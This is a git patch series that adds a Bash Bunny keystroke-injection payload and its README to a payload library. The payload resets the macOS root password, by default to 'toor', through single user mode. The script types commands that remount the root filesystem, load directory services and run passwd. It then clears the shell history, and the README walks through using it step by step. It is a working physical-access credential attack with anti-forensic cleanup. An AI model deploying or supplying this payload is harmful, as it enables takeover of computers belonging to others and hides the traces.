From 745517d25ddd53c325e6ace8ccde18c3e025d0ba Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 1 Feb 2018 20:45:29 -0500 Subject: [PATCH 1/3] Create payload.txt --- .../MacSingleUserPasswd/payload.txt | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 payloads/library/credentials/MacSingleUserPasswd/payload.txt diff --git a/payloads/library/credentials/MacSingleUserPasswd/payload.txt b/payloads/library/credentials/MacSingleUserPasswd/payload.txt new file mode 100644 index 00000000..1b48468d --- /dev/null +++ b/payloads/library/credentials/MacSingleUserPasswd/payload.txt @@ -0,0 +1,37 @@ +#!/bin/bash +# +# Title: MacSingleUserPasswd +# Description: Automatically resets user password on macOS through single user mode +# Author: thehappydinoa +# Version: 1.0.2 +# Category: Credentials +# Target: macOS +# Attackmodes: HID +# + +## OPTIONS + +ACCOUNT="root" +PASSWD="toor" + +## ATTACK +LED STAGE1 +ATTACKMODE HID +Q STRING /sbin/fsck -y\; /sbin/mount -uw /\; echo "Change switch position now"\; +Q ENTER + +LED STAGE2 +WAIT + + +LED STAGE3 +Q STRING launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist\; launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist\; passwd $ACCOUNT\; +Q ENTER +Q STRING $PASSWD +Q ENTER +Q STRING $PASSWD +Q ENTER +LED CLEANUP +Q STRING history -c\; exit\; +Q ENTER +LED FINISH From d7472465dd9eca6800244f32aa5f768571dbdac5 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 1 Feb 2018 20:48:25 -0500 Subject: [PATCH 2/3] Update payload.txt --- payloads/library/credentials/MacSingleUserPasswd/payload.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/payloads/library/credentials/MacSingleUserPasswd/payload.txt b/payloads/library/credentials/MacSingleUserPasswd/payload.txt index 1b48468d..dfc93267 100644 --- a/payloads/library/credentials/MacSingleUserPasswd/payload.txt +++ b/payloads/library/credentials/MacSingleUserPasswd/payload.txt @@ -10,7 +10,6 @@ # ## OPTIONS - ACCOUNT="root" PASSWD="toor" From 509fd26e528dd7e3d2927ad4f54f7521147c07d6 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 1 Feb 2018 21:05:12 -0500 Subject: [PATCH 3/3] Create README.md --- .../credentials/MacSingleUserPasswd/README.md | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 payloads/library/credentials/MacSingleUserPasswd/README.md diff --git a/payloads/library/credentials/MacSingleUserPasswd/README.md b/payloads/library/credentials/MacSingleUserPasswd/README.md new file mode 100644 index 00000000..b7ac03c0 --- /dev/null +++ b/payloads/library/credentials/MacSingleUserPasswd/README.md @@ -0,0 +1,32 @@ +# MacSingleUserPasswd + +* Author: [thehappydinoa](https://github.com/thehappydinoa) +* Version: Version 1.0.2 +* Target: macOS + +## Description + +Quickly and efficiently updates the password of a user though the single user mode on macOS. + +## Configuration + +Update `ACCOUNT` and `PASSWD` accordingly. + +## Use + +1. Restart the Mac. +2. Hold `command` and `s` until you see white text on the screen. +3. Once you come to the `:/ root#` prompt plug in the Bash Bunny. +It should look similar to this: +![Single User Mode](http://cdn2.tekrevue.com/wp-content/uploads/2014/09/single-user-mode.jpg) +4. When it finishs mounting the root directory `/` it will tell you to `Change switch position now`. At this point you should change the switch position. +5. When you see the FINISHED LED you can unplug and wait for the machine to restart. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| STAGE1 | Mounts root directory | +| STAGE2 | Runs WAIT extension | +| STAGE3 | Loads LaunchDaemons for user management | +| FINISH | Clears history and restarts |